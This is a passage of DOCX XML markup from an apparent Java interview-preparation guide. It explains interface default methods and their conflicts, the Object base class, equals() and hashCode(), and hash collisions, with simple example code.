          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because those classes will automatically inherit the default method unless they override it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E04E7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D3B1CB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FCA921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95474B9" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080E9F4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isting default method in Vehicle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3401E20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474901F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56DCDE8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52E385" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70EF61C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default method added later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86B78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tartEngine() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BA4B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engine started");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442ABED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E75CE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E4B362" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C294C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27D2C9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E604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773F819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5A7D5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87D24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9A5C1C" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CC7D1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E853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EA1EF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63B1F93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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB1870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startEngine(); // Output: Vehicle engine started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E95A9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0E9C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35673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1C650E0"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ew method startEngine() is added to the Vehicle interface, it doesn't break the Car class implementation, as it automatically inherits the new default method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00196065"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wever, if the Car class already had a custom implementation for startEngine(), it would override the default method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893ACF3"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otential Issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045ED13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otential issue arises when you add a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default method in multiple interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a class implements those interfaces, leading to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>conflict</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C80B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5D3301F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08DF228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733C0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61FA8C9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F0DF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B5D072" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0A813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face B {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B6EE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03AB351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5A1FA52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F39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184BBF" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591EC99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0D293C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must override the conflicting default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BFB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0AAD3C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548B39A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7C2FD3F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E4C20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4E2C2" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AC004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1924D9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6CE5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4164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56C3B52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0967D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E198AB"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oth interfaces A and B have a default method show(), and C has to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55AAB1BC"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10715C6E"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can add a new default method in the child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and it will not cause any issues for the existing classes, provided that they don't try to access this new method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F3A759"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dding a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new default method to the parent interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> break existing implementations of the interface; those classes will inherit the new method automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABAD29E" w14:textId="07390B57" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48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flicts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> arise if multiple interfaces have default methods with the same signature, and the child class will need to explicitly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68F9DA47" w14:textId="78FEF71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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0A1DA9" w14:textId="3F131CE9" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="008E7699">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc197867289"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In Java, which class is the base class of all the classes</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="2063FC7C" w14:textId="38DB617A" w:rsidR="00D82531" w:rsidRPr="00CE4B95" w:rsidRDefault="00D82531" w:rsidP="001A4E3C">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In Java, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F59ECAB" w14:textId="5AB1CBAF" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00D4020D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc197867290"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why is the equals method required</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="15FB51EA" w14:textId="38561C2D" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC661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reasons why the equals() method is needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5066200F"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gical Equality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E8D29C"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a Person class, two Person objects with the same name and age may be considered logically equal, even if they are different instances (i.e., stored in different memory locations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E4B1D8"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rectness in Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E877905"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 with hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777CB4D4"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considered equal by the equals() method, their hashCode() values must also be the same. This is critical for the correct functioning of hash-based collections like HashMap and HashSet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06322CE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quality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0F4AE"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customize the logic for object equality based on specific fields, such as checking if two Employee objects are equal based on their id and name rather than their memory address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7867D" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC661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1F23A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5A6B680"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7B40C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21475649" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C5F03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6C9DECB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18FD85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66A64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9220D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038FB1" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAC45E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equals method to compare based on name and age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0194A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DB0317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1B67876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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2C2D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ue; // Same object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B9FAC3"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D5F57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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B369BEA"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alse; // Null or different class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5908372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38902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33FF493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63A79D8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538E93" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109176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72F8E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50C291F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 // Consistent with equals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366ED2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5AA8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8B7B9F" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16124B4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6DF4F7E"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F9670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30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF2FBC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30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB18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C26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the overridden equals method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0323CF9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Output: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE042F4"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7555B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6664D7"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 and p2 are logically equal because they have the same name and age, even though they are two different objects in memory. This behavior is controlled by the overridden equals() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB74E2C" w14:textId="29470CA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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCDAB88" w14:textId="7A2159EB" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00D4020D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc197867291"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Is it possible to have the same hashcode for multiple objects</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="40CA11CB" w14:textId="7CB2D75E" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27"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his situation is known as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23197356"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26A74D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t's possible that two or more objects can have the same hash code even though they are logically distinct objects. When this happens, it's called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01CECA90"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 Collision in Hash-Based Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D9ED9"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en two different objects have the same hash code, the collection (e.g., HashMap, HashSet) needs to compare the objects more thoroughl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ensure they are truly equal. This is why it's important to correctly override both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 in your class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803CEF0"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objects have the same hash code, they are stored in the same bucket in a hash-based collection. The collection will then rely on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distinguish between the objects in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2526B18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 Collision:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874F71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A38C511" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EECD32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E6C441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A7C5164"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5E4B1D8D" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B99B3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2584638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2EADDA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7463592"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81FD15" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D6B65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C1E0BC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7B6F23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42; // All instances of Person will have the same hash code (42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4077EE4B"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FD8EE2" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415F538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157E8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30A3B1E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12EC888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173E0BA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4250EF4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35F73E9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8B17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2E2708" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9C4C3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2428C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B3C40F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119611B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4531565E" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CB2E4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5DBB941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Person 1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C191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Person 2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB0A5A" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265902B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map works correctly despite the hash collision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA6E3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 Person 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F3FDB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 Person 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525A24D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4E6A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51B9F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 Hash Collisions Occur?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F57E0AB"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Range of hashCod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Fields Affect Hash Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your hashCode() method is based on a small subset of object fields, two objects with different field values could still end up with the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F7053"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Handle Hash Collisions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23350169"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Always override both methods to ensure that objects with the same values for their fields are considered equal. This will prevent collisions from causing incorrect behavior in hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4383EA24"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istribute Hash Codes Evenly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When overriding hashCode(), try to ensure that the hash codes are distributed evenly to minimize collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA4E7B"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46191A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proper implementation of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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44355C22" w14:textId="57C4EE03" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00447E10">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc197867292"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Enlist a few predefined interfaces from Java 8</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="19455498" w14:textId="6EE06875" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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predefined interfaces that are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
